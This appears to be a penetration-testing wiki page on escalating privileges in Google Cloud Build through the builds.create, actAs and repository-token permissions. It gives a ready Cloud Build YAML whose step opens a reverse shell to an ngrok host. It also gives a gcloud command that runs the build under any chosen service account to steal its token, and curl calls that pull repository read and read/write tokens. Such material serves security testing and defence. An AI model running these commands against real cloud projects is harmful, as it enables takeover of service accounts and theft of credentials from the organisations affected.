GCP - Cloudbuild Privesc


cloudbuild

For more information about Cloud Build, check:

GCP - Cloud Build Enum

cloudbuild.builds.create, iam.serviceAccounts.actAs

With this permission you can submit a cloud build. By default, the cloudbuild machine has a token of the cloudbuild Service Account in its filesystem: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. However, you can specify any service account inside the project in the cloudbuild configuration.
Therefore, you can make the machine exfiltrate the token to your server, or get a reverse shell inside it and retrieve the token yourself (the file holding the token may change).

Direct exploitation via gcloud CLI

1- Create cloudbuild.yaml and modify it with your listener data

Cloud Build YAML configuration for reverse shell

```yaml
steps:
  - name: bash
    script: |
      #!/usr/bin/env bash
      bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1
options:
  logging: CLOUD_LOGGING_ONLY
```

2- Upload a simple build with no source, the yaml file, and specify the SA to use for the build:

Submit Cloud Build with the specified service account

```bash
gcloud builds submit --no-source --config="./cloudbuild.yaml" \
  --service-account="projects/<PROJECT_ID>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com"
```

Using the python gcloud library

You can find the original exploit script here on GitHub (but the location it takes the token from didn't work for me). Therefore, check a script to automate the creation, exploitation and cleanup of a vulnerable environment here, and a python script to get a reverse shell inside the cloudbuild machine and steal it here (in the code you can see how to specify other service accounts).

For a more in-depth explanation, visit https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/

cloudbuild.repositories.accessReadToken

With this permission the user can get the read access token used to access the repository:

Get read access token for repository

```bash
curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  -d '{}' \
  "https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONNECTION>/repositories/<REPOSITORY>:accessReadToken"
```

cloudbuild.repositories.accessReadWriteToken

With this permission the user can get the read and write access token used to access the repository:

Get read and write access token for repository

```bash
curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  -d '{}' \
  "https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONNECTION>/repositories/<REPOSITORY>:accessReadWriteToken"
```

cloudbuild.connections.fetchLinkableRepositories

With this permission you can get the repos the connection has access to:

Get linkable repositories

```bash
curl -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONNECTION>:fetchLinkableRepositories"
```
